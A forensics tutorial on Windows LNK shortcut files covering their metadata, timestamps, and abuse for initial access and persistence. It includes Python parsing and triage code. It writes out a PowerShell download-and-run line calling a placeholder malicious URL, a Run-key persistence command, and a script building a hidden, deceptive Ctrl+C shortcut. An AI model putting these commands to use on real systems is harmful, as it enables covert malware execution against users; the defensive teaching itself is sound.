
LNK Files (Shortcut Files) Forensics

LNK files are shortcuts created automatically by Windows or manually by users. They link to files, folders, or applications. This page shows how attackers can leverage Windows shortcuts for Initial Access and Persistence, and what an LNK file leaves behind for the investigator.

Locations:

  • %APPDATA%\Microsoft\Windows\Recent\

  • User-created LNK files can exist anywhere on the file system

File Extension: .lnk

Forensic Value of LNK Files

  • Path to the Original File: Provides the location of the linked file, though not the absolute path.

  • MAC Addresses: Useful if the file is shared over a network, revealing the MAC address of the host.

  • Network Volume Share Name: Identifies the network share name if the file is stored on a network.

  • Size of the Target: Records the size of the linked file at the time it was last accessed.

  • Serial Number of the Volume: Stores the volume serial number where the file was stored.

  • File Attribute: Contains attributes of the linked file.

  • Distributed Link Info: Provides information about distributed links, useful for tracking files across different locations.

Timestamps

  • Creation Time: When the LNK file was first created.

  • Modification Time: When the LNK file was last altered.
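As an added example (not code from the original notes), a minimal Python parser that pulls the fields listed above out of an LNK file, following the MS-SHLLINK layout: header timestamps, target size, attributes, window style, hotkey, the volume serial number and local path from LinkInfo, and the StringData fields (description, working directory, arguments, icon). The sample bytes in build_sample() are constructed to mirror the page's cmd.exe /c calc.exe shortcut; the serial number, timestamps and the cp1252 fallback code page are assumptions.

```python
import struct
from datetime import datetime, timedelta, timezone

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
STRING_FIELDS = ("name", "relative_path", "working_dir", "arguments", "icon_location")
MODIFIERS = {0x01: "SHIFT", 0x02: "CTRL", 0x04: "ALT"}  # high byte of the HotKey field

def filetime(ft):  # Windows FILETIME (100 ns ticks since 1601-01-01) -> UTC datetime
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_lnk(data):
    """Parse ShellLinkHeader, LinkInfo volume/path and StringData (layout per MS-SHLLINK)."""
    size, clsid, flags, attrs, ctime, atime, wtime, fsize, _, show, hotkey = \
        struct.unpack_from("<I16sIIQQQIIIH", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    keys = [n for b, n in MODIFIERS.items() if (hotkey >> 8) & b] + [chr(hotkey & 0xFF)]  # assumes alphanumeric key
    info = {"created": filetime(ctime), "accessed": filetime(atime), "modified": filetime(wtime),
            "target_size": fsize, "attributes": attrs, "show_command": show,
            "hotkey": "+".join(keys) if hotkey else None}
    pos = 0x4C
    if flags & 0x01:  # HasLinkTargetIDList: 2-byte IDListSize followed by the IDList (skipped here)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & 0x02:  # HasLinkInfo: offsets inside are relative to the start of LinkInfo
        li_size, _, li_flags, vol_off, base_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x01:  # VolumeIDAndLocalBasePath: DriveSerialNumber sits 8 bytes into VolumeID
            info["volume_serial"] = "%08X" % struct.unpack_from("<I", data, pos + vol_off + 8)[0]
            info["local_base_path"] = data[pos + base_off:data.index(b"\0", pos + base_off)].decode("cp1252")
        pos += li_size
    is_unicode = bool(flags & 0x80)  # IsUnicode: StringData is UTF-16LE, else system code page (assumed cp1252)
    for bit, field in enumerate(STRING_FIELDS, start=2):  # bits 2..6: HasName .. HasIconLocation
        if flags & (1 << bit):
            nbytes = struct.unpack_from("<H", data, pos)[0] * (2 if is_unicode else 1)
            info[field] = data[pos + 2:pos + 2 + nbytes].decode("utf-16-le" if is_unicode else "cp1252")
            pos += 2 + nbytes
    return info

def build_sample():
    """Constructed LNK mirroring the page's shortcut: cmd.exe /c calc.exe, CTRL+C hotkey, minimized window."""
    sd = lambda t: struct.pack("<H", len(t)) + t.encode("utf-16-le")  # StringData: CountCharacters + chars
    ft = 132_000_000_000_000_000  # constructed FILETIME, mid-April 2019
    header = struct.pack("<I16sIIQQQIIIH", 0x4C, LNK_CLSID, 0xF6, 0x20, ft, ft, ft, 289792, 70, 7,
                         0x0243) + b"\0" * 10  # flags 0xF6: LinkInfo, name, workdir, args, icon, unicode
    vol = struct.pack("<IIII", 17, 3, 0xDEADBEEF, 16) + b"\0"  # VolumeID: fixed drive, constructed serial, empty label
    base = b"C:\\Windows\\System32\\cmd.exe\0"
    link_info = struct.pack("<IIIIIII", 28 + len(vol) + len(base) + 1, 28, 1, 28, 28 + len(vol), 0,
                            28 + len(vol) + len(base)) + vol + base + b"\0"
    return (header + link_info + sd("Nope, not malicious") + sd("C:") + sd("/c calc.exe")
            + sd("C:\\Windows\\System32\\shell32.dll"))
```

Run parse_lnk(open(path, "rb").read()) on a real shortcut from %APPDATA%\Microsoft\Windows\Recent\ to compare against LECmd output.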

How it works

Let us analyze the LNK file (shortcut) shown above.

The provided image shows the properties of a LNK file (shortcut) being abused for Initial Access and Persistence. Let's analyze its potential malicious use based on the highlighted features.

Abuse of LNK Files

Target Field Abuse: Specifies the file, folder, or command to be executed when the shortcut is launched.

The Target field in the shortcut is set to:

C:\Windows\System32\cmd.exe /c calc.exe

  • This means the shortcut will execute cmd.exe (the Windows command prompt) with the /c option, which tells cmd to run the specified command and then terminate.

  • In this case, it will run calc.exe (Calculator app). While this appears harmless, it can easily be replaced with a malicious payload, such as:

    • Executing PowerShell commands that download and run malware, for example:

    /c powershell -ExecutionPolicy Bypass -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious-url/malware.ps1')"

1. Shortcut Key

The Shortcut key is set to Ctrl + C.

  • When the user presses this key combination, the LNK file executes its target.

  • Malicious actors can use this to trick users into executing malicious code without realizing it, for example by choosing a shortcut key that mimics legitimate behavior (Ctrl + C is what users press to copy).

2. Potential for Initial Access

Phishing Campaigns:

  • Attackers can distribute LNK files disguised as legitimate documents or shortcuts.

  • For example, naming the file "Invoice.lnk" or "Report.lnk" and setting the target to execute malware.

File Masking:

  • By modifying the file icon and name, the LNK can impersonate trusted files (e.g., PDFs, Word documents).

  • Example: Linking cmd.exe /c powershell -ExecutionPolicy Bypass -EncodedCommand <payload> for downloading and running malicious code.

3. Potential for Persistence

Registry Modification:

  • The shortcut could execute commands to modify the Windows Registry for persistence.

  • Example:

    • cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v FakeEntry /t REG_SZ /d C:\malicious.exe

Startup Folder:

  • Placing the malicious LNK file in the Startup folder ensures it runs every time the system boots:

    • C:\Users\<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

The attacker writes the following PowerShell script to create a malicious shortcut with a custom activation key:

$path                      = "$([Environment]::GetFolderPath('Desktop'))\FakeText.lnk"
$wshell                    = New-Object -ComObject Wscript.Shell
$shortcut                  = $wshell.CreateShortcut($path)

$shortcut.IconLocation     = "C:\Windows\System32\shell32.dll,70"

$shortcut.TargetPath       = "cmd.exe"
$shortcut.Arguments        = "/c calc.exe"
$shortcut.WorkingDirectory = "C:"
$shortcut.HotKey           = "CTRL+C"
$shortcut.Description      = "Nope, not malicious"

$shortcut.WindowStyle      = 7
                           # 7 = Minimized window
                           # 3 = Maximized window
                           # 1 = Normal    window
$shortcut.Save()

(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks)
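As an added example (not part of the original notes), a Python triage function for the defender's side of the analysis above: it takes the fields an LNK parser or LECmd reports (where the file sits, its Target, Arguments, HotKey, WindowStyle and Hidden attribute) and flags the abuse patterns this page describes, decoding a PowerShell -EncodedCommand payload so it can be inspected with the same rules. The regexes are heuristics and the sample_case() input is constructed; the path, user name and URL in it are placeholders.

```python
import base64
import re

# Command/script hosts the page shows being launched from the Target field, plus the persistence locations it names.
LOLBIN_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
RUN_KEY = re.compile(r"\breg(?:\.exe)?\s+add\s+\S*\\CurrentVersion\\Run\b", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
DOWNLOAD_EXEC = re.compile(r"\b(?:iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest)\b", re.I)
ENCODED = re.compile(r"-e\w*\s+([A-Za-z0-9+/=]{16,})", re.I)  # -e / -enc / -EncodedCommand <base64> (heuristic)

def decode_encoded_command(arguments):
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # bad padding / alphabet, or odd byte count
        return None

def triage_lnk(lnk_path, target, arguments, hotkey=None, show_command=1, hidden=False):
    """Check parsed LNK fields against the abuse patterns described on this page; returns a list of findings."""
    findings = []
    command_line = f"{target} {arguments}"
    decoded = decode_encoded_command(arguments)
    if decoded:
        findings.append(f"encoded PowerShell command decodes to: {decoded}")
        command_line += " " + decoded  # run the same rules over the decoded payload
    if target.lower().rsplit("\\", 1)[-1] in LOLBIN_HOSTS:
        findings.append(f"target is a command/script host: {target}")
    if DOWNLOAD_EXEC.search(command_line):
        findings.append("command downloads and/or executes remote content")
    if RUN_KEY.search(command_line):
        findings.append("persistence: writes a CurrentVersion\\Run value")
    if STARTUP_DIR.search(lnk_path):
        findings.append("persistence: LNK lives in the Startup folder")
    if hotkey:
        findings.append(f"hotkey {hotkey} set: target fires on a keystroke, not a click")
    if show_command == 7:
        findings.append("window style 7 (minimized): execution hidden from the user")
    if hidden:
        findings.append("LNK has the Hidden attribute")
    return findings

def sample_case():
    """Constructed input modelled on the page: Invoice.lnk in Startup, cmd.exe /c powershell -EncodedCommand."""
    payload = "IEX (New-Object Net.WebClient).DownloadString('http://malicious-url/malware.ps1')"
    enc = base64.b64encode(payload.encode("utf-16-le")).decode()
    return triage_lnk(r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Invoice.lnk",
                      r"C:\Windows\System32\cmd.exe", f"/c powershell -ExecutionPolicy Bypass -EncodedCommand {enc}",
                      hotkey="CTRL+C", show_command=7, hidden=True)
```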

Forensic Significance

  • Provide metadata about accessed files, such as:

    • File path (original location of the target file).

    • File creation, access, and modification timestamps.

    • Volume and drive information (e.g., serial number).

    • Network paths (if the file is on a shared drive).

Tools for Investigation

  • FTK Imager/Autopsy: Locate and extract LNK files.

  • LnkParser or Eric Zimmerman's LECmd: Decode LNK files and retrieve metadata.

For example, here I used the LECmd tool; look at what we got:


Last updated 5 months ago